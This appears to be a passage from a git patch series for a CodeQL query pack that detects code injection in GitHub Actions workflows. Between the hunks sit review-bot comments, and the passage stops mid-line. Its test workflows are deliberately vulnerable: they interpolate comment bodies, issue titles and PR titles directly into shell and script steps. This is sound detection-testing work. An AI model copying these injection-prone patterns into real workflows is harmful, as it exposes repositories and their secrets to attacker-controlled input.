@@ -28,7 +28,7 @@ private predicate isExternalUserControlledIssue(string context) { exists(string reg | reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -45,18 +45,20 @@ private predicate isExternalUserControlledPullRequest(string context) { "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b" ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] private predicate isExternalUserControlledReview(string context) { - Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.review\\.body\\b") + Utils::normalizeExpr(context) + .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.review\\.body\\b")) } bindingset[context] private predicate isExternalUserControlledComment(string context) { - Utils::normalizeExpr(context).regexpMatch("\\bgithub\\.event\\.comment\\.body\\b") + Utils::normalizeExpr(context) + .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.comment\\.body\\b")) } bindingset[context] @@ -68,7 +70,7 @@ private predicate isExternalUserControlledGollum(string context) { "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b" ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -89,7 +91,7 @@ private predicate isExternalUserControlledCommit(string context) { "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b", ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } 
@@ -98,7 +100,7 @@ private predicate isExternalUserControlledDiscussion(string context) { exists(string reg | reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } @@ -118,7 +120,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) { "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b", ] | - Utils::normalizeExpr(context).regexpMatch(reg) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml new file mode 100644 index 00000000000..b17a1fecbeb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml 
@@ -0,0 +1,59 @@ +name: Issue Comment Created + +on: + issue_comment: + types: + - created + +jobs: + jira: + runs-on: ubuntu-latest + if: ${{ github.event.comment.body == '/jira ticket' }} + steps: + - run: echo ${{ github.event.comment.body }} + + - name: Login + uses: atlassian/gajira-login@v3 + env: + JIRA_BASE_URL: ${{ secrets.JIRA_BASE_URL }} + JIRA_USER_EMAIL: ${{ secrets.JIRA_USER_EMAIL }} + JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }} + + - name: SearchParam + run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + + - name: Search + id: search + uses: tomhjp/gh-action-jira-search@v0.2.1 + with: + jql: 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + + - name: Log + run: echo "Found issue ${{ steps.search.outputs.issue }}" + + - name: Create + id: create + if: steps.search.outputs.issue == '' + uses: atlassian/gajira-create@v3 + with: + project: ${{ secrets.JIRA_PROJECT }} + issuetype: Task + summary: '${{ github.event.repository.name }}: ${{ github.event.issue.title }}' + description: | + *Issue Link:* ${{ github.event.issue.html_url }} + + ${{ github.event.issue.body }} + fields: '{"customfield_10006": ${{ toJSON(secrets.JIRA_EPIC_TICKET) }}, "customfield_17401":{"value":${{ toJSON( secrets.JIRA_LAYER_CAKE )}}}}' + + - name: Add Comment + if: steps.search.outputs.issue == '' && steps.create.outputs.issue != '' + uses: actions/github-script@v6 + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + github.rest.issues.createComment({ + issue_number: context.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: '👋 Thanks, Jira [${{steps.create.outputs.issue}}] ticket created.' + }) diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 23e50256756..14b0c535ac6 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
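Review bot: This fixture exercises only the `toJSON(...)` wrapper on a source (the `SearchParam` step), so the `fromJSON(...)` alternative that the same commit adds to `Utils::wrapRegexp` has no test behind it. A regression in that branch of the pattern list would go unnoticed by the `.expected` files. Appending one step at the end of the job, for example `- run: echo ${{ fromJSON(github.event.comment.body) }}`, would pin it without shifting the line numbers already recorded for lines 13 and 23.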
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -131,6 +131,8 @@ nodes | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -234,6 +236,8 @@ subpaths | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 9101c80a595..bdb5ae3ea55 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -131,6 +131,8 @@ nodes | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -229,6 +231,8 @@ subpaths | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | From d9e589c6e7d913c2e3a987c0f2a30676a47df15b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 15 Mar 2024 13:58:46 +0100 Subject: [PATCH 0127/1267] Remove unnecessary boundary anchors --- ql/lib/codeql/actions/Ast.qll | 6 +- .../codeql/actions/dataflow/FlowSources.qll | 64 +++++++++---------- 2 files changed, 34 insertions(+), 36 deletions(-) 
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 91612c5836b..ecc0ad16f5f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -12,7 +12,11 @@ module Utils { bindingset[regex] string wrapRegexp(string regex) { - result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] + result = + [ + "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", + "toJSON\\(\\s*" + regex + "\\s*\\)" + ] } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ca1d2163786..007ace43bd0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -25,9 +25,7 @@ abstract class RemoteFlowSource extends SourceNode { bindingset[context] private predicate isExternalUserControlledIssue(string context) { - exists(string reg | - reg = ["\\bgithub\\.event\\.issue\\.title\\b", "\\bgithub\\.event\\.issue\\.body\\b"] - | + exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } 
@@ -37,12 +35,12 @@ private predicate isExternalUserControlledPullRequest(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.pull_request\\.title\\b", "\\bgithub\\.event\\.pull_request\\.body\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.label\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.default_branch\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.description\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.homepage\\b", - "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b" + "github\\.event\\.pull_request\\.title", "github\\.event\\.pull_request\\.body", + "github\\.event\\.pull_request\\.head\\.label", + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.repo\\.description", + "github\\.event\\.pull_request\\.head\\.repo\\.homepage", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref" ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -51,14 +49,12 @@ private predicate isExternalUserControlledPullRequest(string context) { bindingset[context] private predicate isExternalUserControlledReview(string context) { - Utils::normalizeExpr(context) - .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.review\\.body\\b")) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.review\\.body")) } bindingset[context] private predicate isExternalUserControlledComment(string context) { - Utils::normalizeExpr(context) - .regexpMatch(Utils::wrapRegexp("\\bgithub\\.event\\.comment\\.body\\b")) + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp("github\\.event\\.comment\\.body")) } bindingset[context] 
@@ -66,8 +62,8 @@ private predicate isExternalUserControlledGollum(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.page_name\\b", - "\\bgithub\\.event\\.pages\\[[0-9]+\\]\\.title\\b" + "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", + "github\\.event\\.pages\\[[0-9]+\\]\\.title" ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) @@ -79,16 +75,15 @@ private predicate isExternalUserControlledCommit(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.message\\b", - "\\bgithub\\.event\\.head_commit\\.message\\b", - "\\bgithub\\.event\\.head_commit\\.author\\.email\\b", - "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.head_commit\\.committer\\.email\\b", - "\\bgithub\\.event\\.head_commit\\.committer\\.name\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.email\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.author\\.name\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email\\b", - "\\bgithub\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name\\b", + "github\\.event\\.commits\\[[0-9]+\\]\\.message", "github\\.event\\.head_commit\\.message", + "github\\.event\\.head_commit\\.author\\.email", + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.email", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) 
@@ -98,7 +93,7 @@ private predicate isExternalUserControlledCommit(string context) { bindingset[context] private predicate isExternalUserControlledDiscussion(string context) { exists(string reg | - reg = ["\\bgithub\\.event\\.discussion\\.title\\b", "\\bgithub\\.event\\.discussion\\.body\\b"] + reg = ["github\\.event\\.discussion\\.title", "github\\.event\\.discussion\\.body"] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) @@ -109,15 +104,14 @@ private predicate isExternalUserControlledWorkflowRun(string context) { exists(string reg | reg = [ - "\\bgithub\\.event\\.workflow\\.path\\b", - "\\bgithub\\.event\\.workflow_run\\.head_branch\\b", - "\\bgithub\\.event\\.workflow_run\\.display_title\\b", - "\\bgithub\\.event\\.workflow_run\\.head_repository\\.description\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.message\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.email\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.author\\.name\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.email\\b", - "\\bgithub\\.event\\.workflow_run\\.head_commit\\.committer\\.name\\b", + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.display_title", + "github\\.event\\.workflow_run\\.head_repository\\.description", + "github\\.event\\.workflow_run\\.head_commit\\.message", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) From e0bbb66be47b1076532dcf1a179f1220fdf55e73 Mon Sep 17 00:00:00 2001 
From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 15:11:21 +0100 Subject: [PATCH 0128/1267] Try to fix `actions-all` suite --- ql/src/codeql-suites/actions-all.qls | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls index 2439b95a8e5..8c0f580a7ad 100644 --- a/ql/src/codeql-suites/actions-all.qls +++ b/ql/src/codeql-suites/actions-all.qls @@ -1,2 +1,5 @@ - description: Standard Code Scanning queries for Actions -- queries: . \ No newline at end of file +- queries: . +- include: + kind: + - path-problem From 09c2ba4280c91840c176bab80b056b5aca9e5246 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 16:39:18 +0100 Subject: [PATCH 0129/1267] Make action download `actions-all` --- .github/action/src/codeql.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 56615fa80ce..0fcdd81ee3f 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -24,7 +24,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "githubsecuritylab/actions-all", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), From e60c0b875fd69025fc695601e8981bbf4dae1b6f Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 15 Mar 2024 22:01:06 +0000 Subject: [PATCH 0130/1267] Fix inputs for composite action --- action.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/action.yml b/action.yml index e8f13962e81..9281212ea24 100644 --- a/action.yml +++ b/action.yml 
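Review bot: The added `include` filter keeps only `path-problem` queries, so a suite named `actions-all` drops every `@kind problem` query in the pack; `UntrustedCheckout.ql` in this repository is declared `@kind problem`. If the intent is to select all alert queries, list both kinds: `kind: [problem, path-problem]`. If the restriction is deliberate, a comment in the suite saying why the other kinds are excluded would help.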
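Review bot: `pack` now names `githubsecuritylab/actions-all`, which `ql/lib/qlpack.yml` declares as `library: true`, while the suite path on the next line still points at `codeql-suites/….qls`; the suites in this repository live under `ql/src/codeql-suites`, in the `githubsecuritylab/actions-queries` pack. If pack and suite are joined into one query specifier further down (not visible in this hunk), the default `actions-code-scanning` suite will be looked up in a pack that does not ship it. Keeping `pack: "githubsecuritylab/actions-queries",` and selecting the all-queries suite through the `suite` input looks closer to what the subject line intends. `newCodeQL` continues outside the hunk.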
@@ -26,5 +26,8 @@ runs: env: GITHUB_TOKEN: ${{ inputs.token }} GH_TOKEN: ${{ inputs.token }} + INPUT_SOURCE-ROOT: ${{ inputs.source-root }} + INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} + INPUT_SUITE: ${{ inputs.suite }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 8906bd96350661569f8a29a0790b6700b8aa85e6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 11:00:22 +0100 Subject: [PATCH 0131/1267] Bump versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4dd2ab2866e..7d2de60df75 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.3 +version: 0.0.4 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 90647d42240..f36c119e720 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.3 +version: 0.0.4 groups: - actions - queries From 8023a527a40d8dff50ec949bcba3f7ef6a76567f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 13:02:11 +0100 Subject: [PATCH 0132/1267] fix(untrusted_co): Do not report Reusable workflows called from pull_request --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 24 ++++- .../.github/workflows/changelog_from_prt.yml | 100 ++++++++++++++++++ .../workflows/changelog_required_prt.yml | 9 ++ 3 files changed, 128 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 1be8a6ea0f5..b33c7325526 100644 
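Review bot: `INPUT_SARIF-OUTPUT` does not match what the action reads: the `codeql.ts` hunk earlier in this series calls `core.getInput("sarif")`, which looks up `INPUT_SARIF`, so the `sarif-output` input forwarded here would still be ignored. Either export it under the name the code reads, `INPUT_SARIF: ${{ inputs.sarif-output }}`, or change the call to `core.getInput("sarif-output")`. The other two names do match `getInput("source-root")` and `getInput("suite")`.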
--- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Workflows triggered on `pull_request_target` have read/write access to the base repository and access to secrets. + * @description Priveleged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem @@ -121,12 +121,26 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent([ - "pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", - "workflow_run", "check_run", "check_suite", "workflow_call" - ]) and + ( + // The Workflow is triggered by an event other than `pull_request` + not isSingleTriggerWorkflow(w, "pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + isSingleTriggerWorkflow(w, "workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = w.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not isSingleTriggerWorkflow(caller, "pull_request") + ) + ) and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check 
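Review bot: `Priveleged` in the new `@description` is misspelled, and this text is shown to users next to the alert. Suggested line: `* @description Privileged workflows have read/write access to the base repository and access to secrets.` The wording is also broader than before, so saying what the query counts as privileged (any trigger set other than a lone `pull_request`, per the `where` clause changed in this commit) would keep the description and the query aligned.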
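Review bot: The first disjunct, `not isSingleTriggerWorkflow(w, "pull_request")`, already holds for a workflow whose only trigger is `workflow_call`, so the caller check in the second disjunct never narrows anything and a reusable workflow called only from `pull_request` workflows is still reported. Excluding both lone triggers in the first branch makes the second one effective: `not isSingleTriggerWorkflow(w, ["pull_request", "workflow_call"])`. The same branch now also admits triggers the removed list left out (for example `push` or `schedule`), which is wider than the subject line describes; a comment stating that this is intended would help. The `from … where … select` clause continues outside the hunk.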
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml new file mode 100644 index 00000000000..0ee850f183d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml 
@@ -0,0 +1,100 @@ +name: changelog + +on: + workflow_call: + inputs: + create: + description: Add a log to the changelog + type: boolean + required: false + default: false + update: + description: Update the existing changelog + type: boolean + required: false + default: false + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + if: (inputs.create && failure()) || (inputs.update && success()) + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, 
